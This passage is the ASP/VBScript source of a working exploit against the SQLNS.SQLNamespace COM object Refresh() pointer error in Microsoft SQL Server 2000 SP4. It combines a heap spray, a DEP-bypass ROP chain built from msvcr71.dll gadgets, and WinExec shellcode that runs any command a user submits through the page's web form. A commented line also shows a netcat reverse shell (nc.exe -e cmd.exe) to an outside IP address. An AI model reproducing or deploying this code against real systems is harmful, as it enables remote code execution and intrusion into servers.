For Each Item In arrList
|
||||
PackList = PackList & PackDWORD(Item)
|
||||
Next
|
||||
End Function
|
||||
|
||||
Function PackShellcode(strCode)
|
||||
intLen = Len(strCode) / 4
|
||||
If intLen Mod 2 = 1 Then
|
||||
strCode = strCode & "\x90"
|
||||
intLen = intLen + 1
|
||||
End If
|
||||
arrTmp = Split(strCode, "\x")
|
||||
For I = 1 To UBound(arrTmp) Step 2
|
||||
PackShellcode = PackShellcode & UnEscape("%u" & arrTmp(I + 1) & arrTmp(I))
|
||||
Next
|
||||
End Function
|
||||
|
||||
Function UnicodeToAscii(uStrIn)
|
||||
intLen = Len(strCommand)
|
||||
If intLen Mod 2 = 1 Then
|
||||
For I = 1 To intLen - 1 Step 2
|
||||
UnicodeToAscii = UnicodeToAscii & "%u" & Hex(Asc(Mid(strCommand, I + 1, 1))) & Hex(Asc(Mid(strCommand, I, 1)))
|
||||
Next
|
||||
UnicodeToAscii = UnicodeToAscii & "%u00" & Hex(Asc(Mid(strCommand, I, 1)))
|
||||
Else
|
||||
For I = 1 To intLen - 1 Step 2
|
||||
UnicodeToAscii = UnicodeToAscii & "%u" & Hex(Asc(Mid(strCommand, I + 1, 1))) & Hex(Asc(Mid(strCommand, I, 1)))
|
||||
Next
|
||||
End If
|
||||
UnicodeToAscii = UnEscape(UnicodeToAscii & "%u0000%u0000")
|
||||
End Function
|
||||
|
||||
'''''''''''''''''''''''''''''bypass DEP with [msvcr71.dll] 92 bytes
|
||||
Rop_Chain = Array(_
|
||||
"0x41414141", _
|
||||
"0x7c373ab6", _
|
||||
"0x7c3425bc", _
|
||||
"0x7c376fc5", _
|
||||
"0x7c343423", _
|
||||
"0x7c3415a2", _
|
||||
"0x7c373ab6", _
|
||||
"0x41414141", _
|
||||
"0x41414141", _
|
||||
"0x41414141", _
|
||||
"0x41414141", _
|
||||
"0x7c344dbe", _
|
||||
"0x7c376fc5", _
|
||||
"0x7c373ab6", _
|
||||
"0x7c373ab6", _
|
||||
"0x7c351cc5", _
|
||||
"0x7c3912a3", _
|
||||
"0x7c3427e5", _
|
||||
"0x7c346c0b", _
|
||||
"0x7c3590be", _
|
||||
"0x7c37a151", _
|
||||
"0x7c378c81", _
|
||||
"0x7c345c30" _
|
||||
)
|
||||
Small_Shellcode = "\x64\x8B\x25\x00\x00\x00\x00\xeb\x07\x90\x90\x90"
|
||||
'0C0C0C6C 64:8B25 00000000 MOV ESP,DWORD PTR FS:[0]
|
||||
'0C0C0C73 EB 07 JMP SHORT 0C0C0C7C
|
||||
'0C0C0C75 90 NOP
|
||||
'0C0C0C76 90 NOP
|
||||
'0C0C0C77 90 NOP
|
||||
'12 bytes
|
||||
Fix_ESP = "\x83\xEC\x24\x8B\xEC\x83\xC5\x30"
|
||||
'0C0C0C7C 83EC 24 SUB ESP,24
|
||||
'0C0C0C7F 8BEC MOV EBP,ESP
|
||||
'0C0C0C81 83C5 30 ADD EBP,30
|
||||
'8 bytes
|
||||
'''''''''''''''''''''''''''''shellcode WinExec (win2k sp2)
|
||||
Real_Shellcode = "\xd9\xee\x9b\xd9\x74\x24\xf4\x5e\x83\xc6\x1a\x33\xc0\x50\x56\x68\x41\x41\x41\x41\x68\x16\x41\x86\x7c\xc3"
|
||||
'D9EE FLDZ
|
||||
'9B WAIT
|
||||
'D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C]
|
||||
'5E POP ESI
|
||||
'83C6 1a ADD ESI,1a
|
||||
'33C0 XOR EAX,EAX
|
||||
'50 PUSH EAX
|
||||
'56 PUSH ESI
|
||||
'68 F1F8807C PUSH kernel32.ExitThread
|
||||
'68 1641867C PUSH kernel32.WinExec
|
||||
'C3 RETN
|
||||
'''''''''''''''''''''''''''''main
|
||||
Dim strCmd
|
||||
|
||||
strCmd = Request("cmd")
|
||||
strCommand = "cmd.exe /q /c " & strCmd
|
||||
'strCommand = "C:\Inetpub\wwwroot\nc.exe -e cmd.exe 192.168.194.1 8080"
|
||||
|
||||
strOpcode = PackShellcode(Real_Shellcode) & UnicodeToAscii(strCommand)
|
||||
intOpcode = Len(strOpcode)
|
||||
|
||||
Payload = String((1000/2), UnEscape("%u4141")) & PackDWORD("0x0c0c0c0c") & PackList(Rop_Chain) & PackShellcode(Small_Shellcode) & PackDWORD("0x5a64f0fe") &_
|
||||
PackShellcode(Fix_ESP) & strOpcode &_
|
||||
Padding(928 - intOpcode*2)
|
||||
'Response.Write Len(Payload)
|
||||
Dim Block
|
||||
For N = 1 to 512
|
||||
Block = Block & Payload
|
||||
Next
|
||||
Dim spary()
|
||||
For I = 0 To 200 Step 1
|
||||
Redim Preserve spary(I)
|
||||
spary(I) = Block
|
||||
Next
|
||||
|
||||
If strCmd = "" Then
|
||||
Response.Write "Please Input command! <br />"
|
||||
Else
|
||||
Set obj = CreateObject("SQLNS.SQLNamespace")
|
||||
Response.Write "Try to Execute: " & strCommand
|
||||
arg1 = 202116108 '0x0c0c0c0c
|
||||
obj.Refresh arg1
|
||||
End If
|
||||
%>
|
||||
<html><head><title>Microsoft SQL Server 2000 SP4 SQLNS.SQLNamespace COM object Refresh() Pointer Error Exploit(DEP bypass)</title>
|
||||
<body>
|
||||
<p>
|
||||
Microsoft SQL Server 2000 SP4 SQLNS.SQLNamespace COM object Refresh() Pointer Error Exploit(DEP bypass) <br />
|
||||
Other version not test :) <br />
|
||||
Bug found and Exploit by ylbhz@hotmail.com At 2012/04/03<br />
|
||||
</P>
|
||||
|
||||
<form action="" method="post">
|
||||
Program to Execute:<input type="text" value="<%=strCmd%>"size=120 name="cmd"></input><input type="submit" value="Exploit">
|
||||
</form>
|
||||
</form>
|